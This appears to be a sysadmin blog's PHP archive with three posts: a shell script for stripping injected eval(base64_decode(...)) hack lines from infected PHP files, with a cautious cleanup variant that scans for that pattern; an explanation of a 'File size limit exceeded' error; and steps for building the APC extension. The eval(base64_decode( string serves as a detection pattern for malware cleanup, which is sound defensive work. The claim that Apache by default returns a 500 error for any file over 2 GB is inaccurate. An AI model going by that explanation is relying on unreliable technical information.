Archive for the PHP Category

Script to replace the hack code from all php files

While working on a client’s issue, I came across a situation where I had to replace the hack/eval code in many PHP files, and hence thought of writing a small shell script that would remove the hack/eval code from all the infected PHP files.

And I came up with the simple shell script below and thought of sharing it here 🙂 so that if anyone comes across the same situation, he/she can use that script.

[email protected][#] vi hackreplace.sh
hacked='eval(base64_decode("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"));'
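# replace is the utility shipped with MySQL; quoting and -print0/-0 keep the pattern and odd file names intact
find . -name '*.php' -print0 | xargs -0 replace "$hacked" "" --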

Save and quit.

You can execute the hackreplace.sh file as:

[email protected][#] sh hackreplace.sh

Note: Just change the hack code in the “hacked” variable as per your requirement.

That’s all, say thanks to me 😛
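A more cautious variant of the cleanup above, as an added example that is not the original author's script: it lists the infected files first (dry run), copies each file to a quarantine directory before rewriting it, and then reports files that still call eval(base64_decode( with a different payload. The function names, the quarantine directory and the requirement that the injected string sits on one line are assumptions of this example.

```shell
#!/bin/sh
# Added example. NEEDLE is the exact injected string and must sit on one line;
# QDIR is a quarantine directory outside the web root (both are assumptions).

# list_matching DIR STRING: print .php files under DIR containing the fixed STRING
list_matching() {
    # grep exits 1 when nothing matches, which is not an error here
    find "$1" -type f -name '*.php' -exec grep -lF -e "$2" {} + || true
}

# strip_needle FILE NEEDLE QDIR: keep a copy in QDIR, rewrite FILE without NEEDLE
strip_needle() {
    mkdir -p "$3/$(dirname "$1")" && cp -p "$1" "$3/$1" || return 1
    NEEDLE="$2" awk '
        BEGIN { n = ENVIRON["NEEDLE"]; len = length(n) }
        { while ((i = index($0, n)) > 0)
              $0 = substr($0, 1, i - 1) substr($0, i + len)
          print }' "$3/$1" > "$1"
}

# clean_tree DIR NEEDLE QDIR [apply]: dry run unless "apply"; prints the file count
clean_tree() {
    [ -n "$2" ] || return 2          # an empty needle would match every file
    list=$(mktemp) || return 1
    list_matching "$1" "$2" > "$list"
    count=0
    while IFS= read -r f; do
        count=$((count + 1))
        if [ "${4:-}" = apply ]; then
            strip_needle "$f" "$2" "$3" || { rm -f "$list"; return 1; }
        else
            echo "would clean: $f" >&2
        fi
    done < "$list"
    rm -f "$list"
    echo "$count"
}

# remaining_variants DIR: files still calling eval(base64_decode( after cleaning,
# i.e. injections with a different payload that the exact match did not catch
remaining_variants() {
    list_matching "$1" 'eval(base64_decode('
}
```

Run clean_tree without the fourth argument to review the list, then again with apply. Removing the injected line does not close whatever hole let it be written, so files listed by remaining_variants and the original entry point still need a look.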

File size limit exceeded (core dumped)

Sometimes, when you try to access your domain in a web browser, you get a 500 Internal Server Error. After checking the permissions and ownership of all files and folders under that domain, you find that everything is correct, but you still get that error in the browser.

But when you try to manually execute the PHP file from the server using the php command as

[email protected][public_html]# php index.php
File size limit exceeded (core dumped)

you get the above error and start wondering what on earth that is.

 

Reason for that?

The reason for that error is that one of the files under that domain, probably a log file, has grown beyond 2 GB, and by default Apache has a setting enabled to display a 500 Internal Server Error if any file under a domain exceeds 2 GB.

How to fix?

Either remove that file or empty it with echo, and you are done.

Tried the above fix but it is still not working?

In that case, I suggest you check all the Apache log files, especially error_log, suphp_log, suexec_log and modsec_audit.log, and if you find any log file over 2 GB, just remove/echo that file and restart the Apache service, and you are done.

 

That’s all

Install APC for PHP on Linux

If you want to install APC for PHP on a Linux server, follow the easy steps below:

[email protected][#] pecl install apc

Or

You can install it manually by following the steps below:

[email protected][#] wget http://pecl.php.net/get/APC

The above command always downloads the latest version of APC.

Now extract the downloaded file:

[email protected][#] tar -zxf APC-3.1.9.tgz
[email protected][#] cd APC-3.1.9

Now we need to execute the ‘phpize’ command.

This requires the PHP development package to be installed. On CentOS it is php-devel, which can be installed by running the command:

yum install php-devel

[email protected][/usr/local/src/APC-3.1.9]# phpize
Configuring for:
PHP Api Version: 20090626
Zend Module Api No: 20090626
Zend Extension Api No: 220090626

Now we need to configure APC.

If you are unsure where the php-config file is located, use the command below to find the correct path:

[email protected][#] whereis php-config

php-config: /usr/bin/php-config /usr/local/bin/php-config /usr/man/man1/php-config.1

and then run the configure command like so:

./configure --enable-apc --enable-apc-mmap --with-apxs \
  --with-php-config=/usr/bin/php-config

Now that configure is done, we need to run the ‘make’ command:

[email protected][#] make

and then make install:

[email protected][#] make install

If everything goes well, you will get output like this:

Build process completed successfully
Installing '/usr/local/include/php/ext/apc/apc_serializer.h'
Installing '/usr/local/lib/php/extensions/no-debug-non-zts-20090626/apc.so'
install ok: channel://pecl.php.net/APC-3.1.9
Extension apc enabled in php.ini

Finally, just restart the web server for the changes to take effect:

[email protected][#] /etc/init.d/httpd restart

But if you encounter an error like the one below

/usr/local/src/APC-3.1.5/apc.c:461: error: syntax error before ')' token
make: *** [apc.lo] Error 1

then just execute the command below:

[email protected][#] yum install pcre-devel

After that, try the “make” and “make install” commands again, and they will work now.

That’s all, you are done.